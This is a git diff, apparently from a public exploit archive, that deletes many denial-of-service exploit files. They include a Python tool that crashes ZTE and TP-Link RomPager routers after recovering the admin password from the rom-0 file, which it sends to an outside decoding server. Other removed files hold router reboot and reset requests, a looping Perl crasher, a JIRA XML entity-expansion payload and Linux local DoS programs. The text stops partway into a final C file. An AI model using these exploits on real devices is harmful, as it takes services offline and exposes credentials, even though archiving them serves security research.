./dos.py -i 192.168.1.1 - -import os -import re -import sys -import time -import urllib -import base64 -import httplib -import urllib2 -import requests -import optparse -import telnetlib -import subprocess -import collections -import unicodedata - -class BitReader: - - def __init__(self, bytes): - self._bits = collections.deque() - - for byte in bytes: - byte = ord(byte) - for n in xrange(8): - self._bits.append(bool((byte >> (7-n)) & 1)) - - def getBit(self): - return self._bits.popleft() - - def getBits(self, num): - res = 0 - for i in xrange(num): - res += self.getBit() << num-1-i - return res - - def getByte(self): - return self.getBits(8) - - def __len__(self): - return len(self._bits) - -class RingList: - - def __init__(self, length): - self.__data__ = collections.deque() - self.__full__ = False - self.__max__ = length - - def append(self, x): - if self.__full__: - self.__data__.popleft() - self.__data__.append(x) - if 
self.size() == self.__max__: - self.__full__ = True - - def get(self): - return self.__data__ - - def size(self): - return len(self.__data__) - - def maxsize(self): - return self.__max__ - - def __getitem__(self, n): - if n >= self.size(): - return None - return self.__data__[n] - -def filter_non_printable(str): - return ''.join([c for c in str if ord(c) > 31 or ord(c) == 9]) - - -def banner(): - return ''' - -\t\t _/_/_/ _/_/_/ -\t\t _/ _/ _/_/ _/ -\t\t _/ _/ _/ _/ _/_/ -\t\t _/ _/ _/ _/ _/ -\t\t_/_/_/ _/_/ _/_/_/ - - ''' -def dos(host, password): - while (1): - url = 'http://' +host+ '/Forms/tools_test_1' - parameters = { - 'Test_PVC' : 'PVC0', - 'PingIPAddr' : '\101'*2000, - 'pingflag' : '1', - 'trace_open_flag' : '0', - 'InfoDisplay' : '+-+Info+-%0D%0A' - } - - params = urllib.urlencode(parameters) - - req = urllib2.Request(url, params) - base64string = base64.encodestring('%s:%s' % ('admin', password)).replace('\n', '') - req.add_header("Authorization", "Basic %s" %base64string) - req.add_header("Content-type", "application/x-www-form-urlencoded") - req.add_header("Referer", "http://" +host+ "/maintenance/tools_test.htm") - try: - print '[~] Sending Payload' - response = urllib2.urlopen(req, timeout=1) - sys.exit(0) - - except: - flag = checkHost(host) - if flag == 0: - print '[+] The host is still up and running' - else: - print '[~] Success! 
The host is down' - sys.exit(0) - break - -def checkHost(host): - if sys.platform == 'win32': - c = "ping -n 2 " + host - else: - c = "ping -c 2 " + host - - try: - x = subprocess.check_call(c, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) - time.sleep(1) - return x - - except: - pass - -def checkServer(host): - connexion = httplib.HTTPConnection(host) - connexion.request("GET", "/status.html") - response = connexion.getresponse() - server = response.getheader("server") - connexion.close() - time.sleep(2) - if server == 'RomPager/4.07 UPnP/1.0': - return 0 - else: - return 1 - -def checkPassword(host): - print '[+] Checking for default password' - defaultpass = 'admin' - tn = telnetlib.Telnet(host, 23, 4) - tn.read_until("Password: ") - tn.write(defaultpass + '\n') - time.sleep(2) - banner = tn.read_eager() - banner = regex(len(defaultpass)*r'.'+'\w+' , banner) - tn.write("exit\n") - tn.close() - time.sleep(4) - if banner == 'Copyright': - print '[+] Default password is being used' - dos(host, defaultpass) - else: - print '[!] Default Password is not being used' - while True: - msg = str(raw_input('[?] Decrypt the rom-0 file locally? ')).lower() - try: - if msg[0] == 'y': - password = decodePasswordLocal(host) - print '[*] Router password is: ' +password - dos(host, password) - break - if msg[0] == 'n': - password = decodePasswordRemote(host) - print '[*] Router password is: ' +password - dos(host, password) - break - else: - print '[!] Enter a valid choice' - except Exception, e: - print e - continue - - -def decodePasswordRemote(host): - fname = 'rom-0' - if os.path.isfile(fname) == True: - os.remove(fname) - urllib.urlretrieve ("http://"+host+"/rom-0", fname) - # If this URL goes down you might have to find one and change this function. - # You can also use the local decoder. It might have few errors in getting output. 
- url = 'http://198.61.167.113/zynos/decoded.php' # Target URL - files = {'uploadedfile': open('rom-0', 'rb') } # The rom-0 file we wanna upload - data = {'MAX_FILE_SIZE': 1000000, 'submit': 'Upload rom-0'} # Additional Parameters we need to include - headers = { 'User-agent' : 'Python Demo Agent v1' } # Any additional Headers you want to send or include - - res = requests.post(url, files=files, data=data, headers=headers, allow_redirects=True, timeout=30.0, verify=False ) - res1 =res.content - p = re.search('rows=10>(.*)', res1) - if p: - passwd = found = p.group(1) - else: - password = 'NotFound' - return passwd - -def decodePasswordLocal(host): - # Sometimes this might output a wrong password while finding the exact string. - # print the result as mentioned below and manually find out - fname = 'rom-0' - if os.path.isfile(fname) == True: - os.remove(fname) - urllib.urlretrieve ("http://"+host+"/rom-0", fname) - fpos=8568 - fend=8788 - fhandle=file('rom-0') - fhandle.seek(fpos) - chunk="*" - amount=221 - while fpos < fend: - if fend-fpos < amount: - amount = amount - data = fhandle.read(amount) - fpos += len(data) - - reader = BitReader(data) - result = '' - - window = RingList(2048) - - while True: - bit = reader.getBit() - if not bit: - char = reader.getByte() - result += chr(char) - window.append(char) - else: - bit = reader.getBit() - if bit: - offset = reader.getBits(7) - if offset == 0: - break - else: - offset = reader.getBits(11) - - lenField = reader.getBits(2) - if lenField < 3: - lenght = lenField + 2 - else: - lenField <<= 2 - lenField += reader.getBits(2) - if lenField < 15: - lenght = (lenField & 0x0f) + 5 - else: - lenCounter = 0 - lenField = reader.getBits(4) - while lenField == 15: - lenField = reader.getBits(4) - lenCounter += 1 - lenght = 15*lenCounter + 8 + lenField - - for i in xrange(lenght): - char = window[-offset] - result += chr(char) - window.append(char) - - result = 
filter_non_printable(result).decode('unicode_escape').encode('ascii','ignore') - # In case the password you see is wrong while filtering, manually print it from here and findout. - #print result - if 'TP-LINK' in result: - result = ''.join(result.split()).split('TP-LINK', 1)[0] + 'TP-LINK'; - result = result.replace("TP-LINK", "") - result = result[1:] - - if 'ZTE' in result: - result = ''.join(result.split()).split('ZTE', 1)[0] + 'ZTE'; - result = result.replace("ZTE", "") - result = result[1:] - - if 'tc160' in result: - result = ''.join(result.split()).split('tc160', 1)[0] + 'tc160'; - result = result.replace("tc160", "") - result = result[1:] - return result - -def regex(path, text): - match = re.search(path, text) - if match: - return match.group() - else: - return None - -def main(): - if sys.platform == 'win32': - os.system('cls') - else: - os.system('clear') - try: - print banner() - print ''' -|=--------=[ ZTE and TP-Link RomPager Denial of Service Exploit ]=-------=|\n -[*] Author: Osanda Malith Jayathissa -[*] Follow @OsandaMalith -[!] Disclaimer: This proof of concept is strictly for research, educational or ethical (legal) purposes only. -[!] Author takes no responsibility for any kind of damage you cause. - - ''' - parser = optparse.OptionParser("usage: %prog -i ") - parser.add_option('-i', dest='host', - type='string', - help='Specify the IP to attack') - (options, args) = parser.parse_args() - - if options.host is None: - parser.print_help() - exit(-1) - - host = options.host - x = checkHost(host) - - if x == 0: - print '[+] The host is up and running' - server = checkServer(host) - if server == 0: - checkPassword(host) - else: - print ('[!] Sorry the router is not running RomPager') - else: - print '[!] The host is not up and running' - sys.exit(0) - - except KeyboardInterrupt: - print '[!] Ctrl + C detected\n[!] Exiting' - sys.exit(0) - except EOFError: - print '[!] Ctrl + D detected\n[!] 
Exiting' - sys.exit(0) - -if __name__ == "__main__": - main() -#EOF \ No newline at end of file diff --git a/platforms/hardware/webapps/27775.py b/platforms/hardware/webapps/27775.py deleted file mode 100755 index c4ca1754d..000000000 --- a/platforms/hardware/webapps/27775.py +++ /dev/null 
@@ -1,95 +0,0 @@ -#!/usr/bin/python - -################################################################ -# # -# Netgear ProSafe - CVE-2013-4776 PoC # -# written by Juan J. Guelfo @ Encripto AS # -# post@encripto.no # -# # -# Copyright 2013 Encripto AS. All rights reserved. # -# # -# This software is licensed under the FreeBSD license. # -# http://www.encripto.no/tools/license.php # -# # -################################################################ - -import sys, getopt, urllib2 -from subprocess import * - - -__version__ = "0.1" -__author__ = "Juan J. Guelfo, Encripto AS (post@encripto.no)" - - -# Prints title and other header info -def header(): - print "" - print " ================================================================= " - print "| Netgear ProSafe - CVE-2013-4776 PoC \t\t\t\t |".format(__version__) - print "| by {0}\t\t |".format(__author__) - print " ================================================================= " - print "" - - -# Prints help -def help(): - header() - print """ - Usage: python CVE-2013-4776.py [mandatory options] - - Mandatory options: - -t target ...Target IP address - -p port ...Port where the HTTP admin interface is listening on - - Example: - python CVE-2013-4776.py -t 192.168.0.1 -p 80 - """ - sys.exit(0) - - -if __name__ == '__main__': - - #Parse options - try: - options, args = getopt.getopt(sys.argv[1:], "t:p:", ["target=", "port="]) - - except getopt.GetoptError, err: - header() - print "\n[-] Error: {0}.\n".format(str(err)) - sys.exit(1) - - if not options: - help() - - target = None - port = None - for opt, arg in options: - if opt in ("-t"): - target = arg - - if opt in ("-p"): - port = arg - - #Option input validation - if not target or not port: - help() - print "[-] Error: Incorrect syntax.\n" - sys.exit(1) - - header() - headers = { "User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)" } - - try: - # Get the startup config via HTTP admin interface - print "[+] Triggering DoS 
condition..." - r = urllib2.Request('http://%s:%s/filesystem/' % (target, port), None, headers) - urllib2.urlopen(r,"",5).read() - - except urllib2.URLError: - print "[-] Error: The connection could not be established.\n" - - except: - print "[+] The switch should be freaking out..." - print "[+] Reboot the switch (unplug the power cord) to get it back to normal...\n" - - sys.exit(0) diff --git a/platforms/hardware/webapps/30688.py b/platforms/hardware/webapps/30688.py deleted file mode 100755 index bf535c71f..000000000 --- a/platforms/hardware/webapps/30688.py +++ /dev/null @@ -1,33 +0,0 @@ -# Exploit Title: Motorola SBG6580 Cable Modem & Wireless-N Router Denial of Service -# Date: 01/03/14 -# Exploit Author: nicx0 -# Vendor Homepage: http://www.motorola.com/ -# Software Link: http://www.motorola.com/us/SBG6580-SURFboard%C2%AE-eXtreme-Wireless-Cable-Modem/70902.html -# Version: SBG6580-6.5.0.0-GA-00-226-NOSH -# POSTing a bad login page parameter causes the router to reboot. - -import sys -import socket -import urllib2 -import urllib -router_ip = '' -try: - router_ip = str(sys.argv[1]) -except: - print 'motobug.py ip_address : e.g. motobug.py 192.168.0.1' - sys.exit(2) -query_args = {'this_was':'too_easy'} -url = 'http://' + router_ip + '/goform/login' -post_data = urllib.urlencode(query_args) -request = urllib2.Request(url, post_data) -try: - print '[+] Sending invalid POST request to ' + url + '...' - response = urllib2.urlopen(request,timeout=5) -except socket.timeout: - print '[+] Success! No response from the modem.' -except urllib2.HTTPError: - print '[-] Failed: HTTP error received. The modem might not be a SBG6580.' -except urllib2.URLError: - print '[-] Failed: URL error received. Check the IP address again..' -else: - print '[-] Failed: HTTP response received. Modem does not appear to be vulnerable.' diff --git a/platforms/hardware/webapps/34172.txt b/platforms/hardware/webapps/34172.txt deleted file mode 100755 index 2d392f3b7..000000000 
--- a/platforms/hardware/webapps/34172.txt +++ /dev/null @@ -1,30 +0,0 @@ -# Title : Sagem F@st 3304-V1 denial of service Vulnerability -# Vendor Homepage : http://www.sagemcom.com -# Tested on : Firefox, Google Chrome -# Tested Router : Sagem F@st 3304-V1 -# Date : 2014-07-26 -# Author : Z3ro0ne -# Contact : saadousfar59@gmail.com -# Facebook Page : https://www.facebook.com/Z3ro0ne - -# Vulnerability description : -the Vulnerability allow unauthenticated users to remotely restart and reset the router -# Exploit: - - -SAGEM FAST3304-V1 DENIAL OF SERVICE - -
- -
-
- -
- - -Reset to factory configuration : ---- Using Google Chrome browser : -to reset the router without any authentication just execute the following url http://ROUTER-ipaddress/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale in the url bar - - - diff --git a/platforms/hardware/webapps/34203.txt b/platforms/hardware/webapps/34203.txt deleted file mode 100755 index d623bdf62..000000000 --- a/platforms/hardware/webapps/34203.txt +++ /dev/null @@ -1,112 +0,0 @@ -Exploit Title: Dlink DWR-113 Rev. Ax - CSRF causing Denial of Service -Google dork : N/A -Exploit Author: Blessen Thomas -Date : 29/07/14 -Vendor Homepage : http://www.dlink.com/ -Software Link : N/A -Firmware version: v2.02 2013-03-13 -Tested on : Windows 7 -CVE : CVE-2014-3136 -Type of Application : Web application -Release mode : Coordinated disclosure - - - -Vulnerability description: - - - -It was observed that the D-link DWR-113 wireless router is vulnerable to -denial of service attack via CSRF(Cross-Site Request Forgery) vulnerability. - - - -An attacker could craft a malicious CSRF exploit to change the password in -the password functionality when the user(admin) is logged in to the -application ,as the user interface (admin panel) lacks the csrf token or -nonce to prevent an attacker to change the password. - - - -As a result, as soon as the crafted malicious exploit is executed the -router is rebooted and the user could not login thus forcing to reset the -router’s device physically ,leading to a denial of service condition. - - - -POC code (exploit) : - - - -*Restart Router by CSRF* - - - - - - - - - -
- - - - - - - - - - - - - - - - - -
- - - - - - - - - -Tools used : - -Mozilla firefox browser v28.0 , Burp proxy free edition v1.5 - - - -Timeline : - - - -06-04-14 : Contacted Vendor with details of Vulnerability and Exploit. - - - -06-04-14 : Vendor D-Link forwards to R&D team for review - - - -29-04-14 : Vendor contacted to know the status. - - - -01-05-14 : Vendor acknowledged and released a patch - - - -01-05-14 : CVE ID provided by Mitre team. - - - -http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10034 - - - diff --git a/platforms/hardware/webapps/35345.txt b/platforms/hardware/webapps/35345.txt deleted file mode 100755 index b0176f931..000000000 --- a/platforms/hardware/webapps/35345.txt +++ /dev/null 
@@ -1,57 +0,0 @@ -TP-Link TL-WR740N Wireless Router MitM httpd Denial Of Service - - -Vendor: TP-LINK Technologies Co., Ltd. -Product web page: http://www.tp-link.us - -Affected version: - -- Firmware version: 3.17.0 Build 140520 Rel.75075n (Released: 5/20/2014) -- Firmware version: 3.16.6 Build 130529 Rel.47286n (Released: 5/29/2013) -- Firmware version: 3.16.4 Build 130205 Rel.63875n (Released: 2/5/2013) -- Hardware version: WR740N v4 00000000 (v4.23) -- Model No. TL-WR740N / TL-WR740ND - -Summary: The TL-WR740N is a combined wired/wireless network connection -device integrated with internet-sharing router and 4-port switch. The -wireless N Router is 802.11b&g compatible based on 802.11n technology -and gives you 802.11n performance up to 150Mbps at an even more affordable -price. Bordering on 11n and surpassing 11g speed enables high bandwidth -consuming applications like video streaming to be more fluid. - -Desc: The TP-Link WR740N Wireless N Router network device is exposed to a -denial of service vulnerability when processing a HTTP GET request. This -issue occurs when the web server (httpd) fails to handle a HTTP GET request -over a given default TCP port 80. Resending the value 'new' to the 'isNew' -parameter in 'PingIframeRpm.htm' script to the router thru a proxy will -crash its httpd service denying the legitimate users access to the admin -control panel management interface. To bring back the http srv and the -admin UI, a user must physically reboot the router. 
- -Tested on: Router Webserver - - -Vulnerability discovered by Gjoko 'LiquidWorm' Krstic - @zeroscience - - -Advisory ID: ZSL-2014-5210 -Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5210.php - - -13.11.2014 - ---- - - -Replay - -GET /userRpm/PingIframeRpm.htm?ping_addr=zeroscience.mk&doType=ping&isNew=new&lineNum=1 HTTP/1.1 -Host: 192.168.0.1 -User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: en-US,en;q=0.5 -Accept-Encoding: gzip, deflate -Referer: http://192.168.0.1/userRpm/PingIframeRpm.htm?ping_addr=zeroscience.mk&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20 -Authorization: Basic YWRtaW46YWRtaW4= -Connection: keep-alive diff --git a/platforms/hardware/webapps/9980.txt b/platforms/hardware/webapps/9980.txt deleted file mode 100755 index 593ae725a..000000000 --- a/platforms/hardware/webapps/9980.txt +++ /dev/null 
@@ -1,127 +0,0 @@ -_________________________________________ -Security Advisory NSOADV-2009-002 -_________________________________________ -_________________________________________ - - - Title: Websense Email Security Web Administrator DoS - Severity: Low - Advisory ID: NSOADV-2009-002 - Found Date: 28.09.2009 - Date Reported: 01.10.2009 - Release Date: 20.10.2009 - Author: Nikolas Sotiriu - Mail: nso-research (at) sotiriu.de - URL: http://sotiriu.de/adv/NSOADV-2009-002.txt - Vendor: Websense (http://www.websense.com/) - Affected Products: Websense Email Security v7.1 - Personal Email Manager v7.1 - Not Affected Products: Websense Email Security v7.1 Hotfix 4 - Personal Email Manager v7.1 Hotfix 4 - Remote Exploitable: Yes - Local Exploitable: Yes - Patch Status: Patched with Hotfix 4 - Disclosure Policy: http://sotiriu.de/policy.html - Thanks to: Thierry Zoller: for the permission to use his - Policy - - - -Background: -=========== - -Websense Email Security software incorporates multiple layers of -real-time Web security and data security intelligence to provide -leading email protection from converged email and Web 2.0 threats. -It helps to manage outbound data leaks and compliance risk, and enables -a consolidated security strategy with the trusted leader in Essential -Information Protection. - -(Product description from Websense Website) - -The Websense Email Security Web Administrator is a webfrontend, which -enables you to access the message administration, directory management -and to view the log. - - - -Description: -============ - -The Web Administrator frontend (STEMWADM.EXE) listens by default on port -TCP/8181. - -If an attacker sends a HTTP Request to port 8181 without waiting for a -response the webserver crashes. The proof of concept script just sends -a "GET /index.asp" and closes the socket. The server can not response -to the request anymore and dies. - -By default the service will always restart after a crash. 
So the poc -will send the request until it will be stopped. - - - -Proof of Concept : -================== - -#!/usr/bin/perl -use Socket; - -(($target = $ARGV[0]) && ($port = $ARGV[1])) || die "Usage: $0 ", -" \n"; - -print "\nThe Webserver on http://$target:$port should be dead until", -"this script is running\n"; - -while (1) { -$ip = inet_aton($target) || die "host($target) not found.\n"; -$sockaddr = pack_sockaddr_in($port, $ip); -socket(SOCKET, PF_INET, SOCK_STREAM, 0) || die "socket error.\n"; - -connect(SOCKET, $sockaddr) || die "connect $target $port error.\n"; - -print SOCKET "GET /index.asp"; -print "Request sent ...\n"; - -close(SOCKET); - -sleep 1; - -}; - - - - - -Solution: -========= - -Vendor released a patch. - -http://tinyurl.com/yhe3hqa - - - -Disclosure Timeline (YYYY/MM/DD): -================================= - -2009.09.28: Vulnerability found -2009.10.01: Ask for a PGP Key -2009.10.01: Websense sent there PGP Key -2009.10.01: Sent PoC, Advisory, Disclosure policy and planned disclosure - date to Vendor -2009.10.08: Websense was not able to reproduce the DoS Problem -2009.10.08: Sent a mail with more explanation -2009.10.13: Websense verifies the finding and fixed it. The path will be - available in Version 7.2 which will be released in ~2 weeks -2009.10.13: Ask for a list of affected versions/products and changed the - release date to 2009.10.29. - (no response) -2009.10.20: Found the KB article and the Hotfix on Websense website -2009.10.20: Release of this advisory - - - - - - diff --git a/platforms/jsp/webapps/37218.txt b/platforms/jsp/webapps/37218.txt deleted file mode 100755 index 10b7331c7..000000000 --- a/platforms/jsp/webapps/37218.txt +++ /dev/null 
@@ -1,53 +0,0 @@ -source: http://www.securityfocus.com/bid/53595/info - -JIRA, and the Gliffy and Tempo plugins for JIRA are prone to a denial-of-service vulnerability because they fail to properly handle crafted XML data. - -Exploiting this issue allows remote attackers to cause denial-of-service conditions in the context of an affected application. - -The following versions are affected: - -Versions prior to JIRA 5.0.1 are vulnerable. -Versions prior to Gliffy 3.7.1 are vulnerable. -Versions prior to Tempo versions 6.4.3.1, 6.5.1, and 7.0.3 are vulnerable. - -POST somehost.com HTTP/1.1 -Accept-Encoding: gzip,deflate -Content-Type: text/xml;charset=UTF-8 -SOAPAction: "" -User-Agent: Jakarta Commons-HttpClient/3.1 -Host: somehost.com -Content-Length: 1577 - - - - - - - - - - - -]> - - - - - - - stuff1 - ?&lol9; - - stuff3 - - - stuff4 - stuff5 - - - - - - - diff --git a/platforms/linux/local/10022.c b/platforms/linux/local/10022.c deleted file mode 100755 index 7387a7a4e..000000000 --- a/platforms/linux/local/10022.c +++ /dev/null @@ -1,31 +0,0 @@ -int main(void) -{ - int ret; - int csd; - int lsd; - struct sockaddr_un sun; - - /* make an abstruct name address (*) */ - memset(&sun, 0, sizeof(sun)); - sun.sun_family = PF_UNIX; - sprintf(&sun.sun_path[1], "%d", getpid()); - - /* create the listening socket and shutdown */ - lsd = socket(AF_UNIX, SOCK_STREAM, 0); - bind(lsd, (struct sockaddr *)&sun, sizeof(sun)); - listen(lsd, 1); - shutdown(lsd, SHUT_RDWR); - - /* connect loop */ - alarm(15); /* forcely exit the loop after 15 sec */ - for (;;) { - csd = socket(AF_UNIX, SOCK_STREAM, 0); - ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun)); - if (-1 == ret) { - perror("connect()"); - break; - } - puts("Connection OK"); - } - return 0; -} \ No newline at end of file diff --git a/platforms/linux/local/19818.c b/platforms/linux/local/19818.c deleted file mode 100755 index 4e83e3105..000000000 --- a/platforms/linux/local/19818.c +++ /dev/null 
@@ -1,27 +0,0 @@
-source: http://www.securityfocus.com/bid/1072/info
-
-A denial of service exists in Linux kernels, as related to Unix domain sockets ignoring limits as set in /proc/sys/net/core/wmem_max. By creating successive Unix domain sockets, it is possible to cause a denial of service in some versions of the Linux kernel. Versions 2.2.12, 2.2.14, and 2.3.99-pre2 have all been confirmed as being vulnerable. Previous kernel versions are most likely vulnerable.
-
-#include
-#include
-#include
-
-char buf[128 * 1024];
-
-int main ( int argc, char **argv )
-{
-struct sockaddr SyslogAddr;
-int LogFile;
-int bufsize = sizeof(buf)-5;
-int i;
-
-for ( i = 0; i < bufsize; i++ )
-buf[i] = ' '+(i%95);
-buf[i] = '\0';
-
-SyslogAddr.sa_family = AF_UNIX;
-strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_data) );
-LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 );
-sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr) );
-return 0;
-}
\ No newline at end of file
diff --git a/platforms/linux/local/19850.c b/platforms/linux/local/19850.c
deleted file mode 100755
index 4e83e3105..000000000
--- a/platforms/linux/local/19850.c
+++ /dev/null
@@ -1,31 +0,0 @@
-source: http://www.securityfocus.com/bid/1111/info
-
-A denial of service exists in the X11 font server shipped with RedHat Linux 6.x. Due to improper input validation, it is possible for any user to crash the X fontserver. This will prevent the X server from functioning properly.
-
-Additional, similar problems exist in the stock xfs. Users can crash the font server remotely, and potential exists for buffer overruns. The crux of the problem stems from the font server being lax about verifying network input. While no exploits exist, it is likely they are available in private circles, and can result in remote root compromise.
-
-#include
-#include
-
-#define CNT 50
-#define FS "/tmp/.font-unix/fs-1"
-
-int s,y;
-struct sockaddr_un x;
-
-char buf[CNT];
-
-main() {
- for (y;y<2;y++) {
- s=socket(PF_UNIX,SOCK_STREAM,0);
- x.sun_family=AF_UNIX;
- strcpy(x.sun_path,FS);
- if (connect(s,&x,sizeof(x))) { perror(FS); exit(1); }
- if (!y) write(s,"lK",2);
- memset(buf,'A',CNT);
- write(s,buf,CNT);
- shutdown(s,2);
- close(s);
- }
-}
-
diff --git a/platforms/linux/local/19870.pl b/platforms/linux/local/19870.pl
deleted file mode 100755
index 942efbea9..000000000
--- a/platforms/linux/local/19870.pl
+++ /dev/null
@@ -1,16 +0,0 @@
-source: http://www.securityfocus.com/bid/1136/info
-
-CVS stands for Concurrent Versions Software and is an open-source package designed to allow multiple developers to work concurrently on a single source tree, recording changes and controlling versions. It is possible to cause a denial of service for users of CVS due to predictable temporary filenames. CVS uses locking directories in /tmp and combines the static string 'cvs-serv' with the process ID to use as filenames. This is trivial to guess for an attacker, and since /tmp is world writeable, directories can be created with predicted names. CVS drops root priviliges, so these directories cannot be overwritten and every session for which a locking directory has been already created (by the attacker) will be broken.
-
-The following perl script will create many directories in /tmp with incrementing pids:
-
-#!/usr/bin/perl
-
-$min=400;
-$max=4000;
-
-for ($x=$min;$x<=$max;$x++) {
-open CVSTMP, ">>/tmp/cvs-serv$x" or die "/tmp/cvs-serv$x: $!";
-chmod 0600, "/tmp/cvs-serv$x";
-close CVSTMP;
-}
\ No newline at end of file
diff --git a/platforms/linux/local/20217.c b/platforms/linux/local/20217.c
deleted file mode 100755
index 85bd7abcf..000000000
--- a/platforms/linux/local/20217.c
+++ /dev/null
@@ -1,137 +0,0 @@ -source: http://www.securityfocus.com/bid/1664/info - -Any user with write access to /tmp or /var/tmp, can induce tmpwatch to cause Red Hat (and others runnng tmpwatch from cron) to stop responding, and possibly require a hard reboot. This is accomplished by creating a directory tree many (ie. ~6000) nodes deep in /tmp. For each level of the directory in /tmp, tmpwatch will fork() a new copy of itself. - -Red Hat affected versions: - -Red Hat Linux 7.0 (tmpwatch v.2.5.1) -Red Hat Linux 6.2 (tmpwatch v.2.2) - -Note: -(excerpted from Internet Security Systems Security Advisory) - -"Source code comparison between the Red Hat Linux 6.2 and 7.0 tmpwatch packages -suggests this vulnerability was recognized and a fix was attempted. However, -the fix is incorrect, and the vulnerability is still exploitable. - -Do not use the --fuser or -s options with tmpwatch." - ----START---cut---:a.c (mode 644) -// -// make lots of directories. -// ./a <#of-dirs> -// ./a with no arguments to delete dirs. -main(int argc,char *argv[]) -{ -int c=0,d=0; -if (argc!=2) -{ -while(!chdir("./A"))c++; -chdir(".."); -printf("c=%d removing\n",c); -while(!rmdir("./A")) {chdir("..");c--;} -if(c)printf("erm. bad thing.\n"); -} -else -{ -c=atoi(argv[1]); -printf("c=%d making.\n",c); -while(c--) -{ -mkdir("./A",0777); -chdir("./A"); -} -} -} ---END---cut-----:a.c - -# ./testscript - -(code follows) - ----START---cut---:testscript (mode 755) -#!/bin/sh -# clear the previous stuff. -./a -rm ./timer.results -touch timer.results -# create a 1 deep -./a 1 >>timer.results -time tmpwatch 240 . 2>>timer.results -# create a 100 deep -./a 100 >>timer.results -time tmpwatch 240 . 2>>timer.results -# create a 200 deep -./a 200 >>timer.results -time tmpwatch 240 . 2>>timer.results -# create a 300 deep -./a 300 >>timer.results -time tmpwatch 240 . 2>>timer.results -# create a 400 deep -./a 400 >>timer.results -time tmpwatch 240 . 
2>>timer.results -# create a 500 deep -./a 500 >>timer.results -time tmpwatch 240 . 2>>timer.results -# create a 600 deep -./a 600 >>timer.results -time tmpwatch 240 . 2>>timer.results -#tidy up. -./a >>timer.results - ---END---cut-----:testscript - -If you don't want to test it manually, here you will find the results on -the tests on my machine. Who says u need an Athlon with cable or DSL. I -say "Well, it would be nice. Real nice." I also think this program would -probably die faster and more spectacularly on a fast machine with a huge -amount of memory and swap space. Oh yeah. Save anything important. And you -have to run it as root. (I think. Should probably thought of that. I'll -remember it for next time.) The crontab is an effective way of getting it -run as root. Which it wants to do anyway. At about 4am everyday. - ---START---cut---:timer.results (mode 644) -c=1 making. -0.00user 0.01system 0:00.00elapsed 125%CPU (0avgtext+0avgdata 0maxresident)k -0inputs+0outputs (96major+58minor)pagefaults 0swaps -c=100 making. -0.01user 0.19system 0:00.19elapsed 100%CPU (0avgtext+0avgdata 0maxresident)k -0inputs+0outputs (96major+1797minor)pagefaults 0swaps -c=200 making. -0.07user 0.40system 0:00.49elapsed 94%CPU (0avgtext+0avgdata 0maxresident)k -0inputs+0outputs (96major+3554minor)pagefaults 0swaps -c=300 making. -0.10user 0.66system 0:00.76elapsed 99%CPU (0avgtext+0avgdata 0maxresident)k -0inputs+0outputs (96major+5308minor)pagefaults 0swaps -c=400 making. -0.13user 1.33system 0:11.80elapsed 12%CPU (0avgtext+0avgdata 0maxresident)k -0inputs+0outputs (11766major+9445minor)pagefaults 1263swaps -c=500 making. -0.15user 2.11system 0:22.38elapsed 10%CPU (0avgtext+0avgdata 0maxresident)k -0inputs+0outputs (14104major+13238minor)pagefaults 2699swaps -c=600 making. -0.21user 2.81system 0:32.61elapsed 9%CPU (0avgtext+0avgdata 0maxresident)k -0inputs+0outputs (26066major+17781minor)pagefaults 4109swaps -c=600 removing -c=600 making. 
-0.11user 2.88system 0:36.14elapsed 8%CPU (0avgtext+0avgdata 0maxresident)k -0inputs+0outputs (25741major+17567minor)pagefaults 4009swaps -c=700 making. -0.20user 4.24system 0:45.95elapsed 9%CPU (0avgtext+0avgdata 0maxresident)k -0inputs+0outputs (35562major+22180minor)pagefaults 5542swaps -c=800 making. -Command terminated by signal 2 -0.00user 0.00system 6:01.87elapsed 0%CPU (0avgtext+0avgdata 0maxresident)k -0inputs+0outputs (102major+18minor)pagefaults 10swaps ---END---cut-----:timer.results - -(System is Cyrix-6x86 @ 187 MHz, 32M physical ram, 64M swap.) - -(^C was pressed after about a minute into the 800 deep one. Several system -programs died due to memory starvation. It took a quite a while afterwards -before the console regained any usabilty. When i tried to run startx, it -refused to start. xfs had died. everything looked odd. slow motion. i -think it was because of the loadavg) - -# uptime -9:00pm up 2:14, 2 users, load average: 202.28, 363.68, 186.46 \ No newline at end of file diff --git a/platforms/linux/local/20535.txt b/platforms/linux/local/20535.txt deleted file mode 100755 index 8fd428a18..000000000 --- a/platforms/linux/local/20535.txt +++ /dev/null 
@@ -1,7 +0,0 @@
-source: http://www.securityfocus.com/bid/2180/info
-
-ReiserFS is a file system alternative to the Linux ext2 file system. It was originally written by Hans Reiser, and is freely available and publicly maintained.
-
-A problem has been reported in the handling of long file names with ReiserFS version 3.5.28 on SuSE Linux distribution 7.0. It is possible to create a directory with a long file name (the initial example displayed a directory with 768 characters), then attempt to list the file system using system binary ls or with built in shell function echo and create a Denial of Service. Upon attempting to list or echo the contents of the filesystem, a kernel buffer overflow occurs, overwriting variables on the stack including possibly the return address, as well as crashing the system. It may be possible for a malicious user to execute arbitrary code, deny service to legitimate users, and potentially break out of a chroot environment. This vulnerability is yet unverified.
-
-mkdir "$(perl -e 'print "x" x 768')"
\ No newline at end of file
diff --git a/platforms/linux/local/22105.c b/platforms/linux/local/22105.c
deleted file mode 100755
index 5c0de2c5a..000000000
--- a/platforms/linux/local/22105.c
+++ /dev/null
@@ -1,32 +0,0 @@
-source: http://www.securityfocus.com/bid/6420/info
-
-A denial of service vulnerability has been discovered in the Linux 2.2 kernel. It has been reported that it is possible for an unprivileged user to cause the kernel to stop responding due to a bug in the implementation of mmap().
-
-It should be noted that this issue does not affect the 2.4 kernel tree. This is because support for mmap() in the /proc/pid/mem implementation has been dropped.
-
- #define PAGES 10
-
- #include
- #include
- #include
- #include
- #include
- #include
-
- int main() {
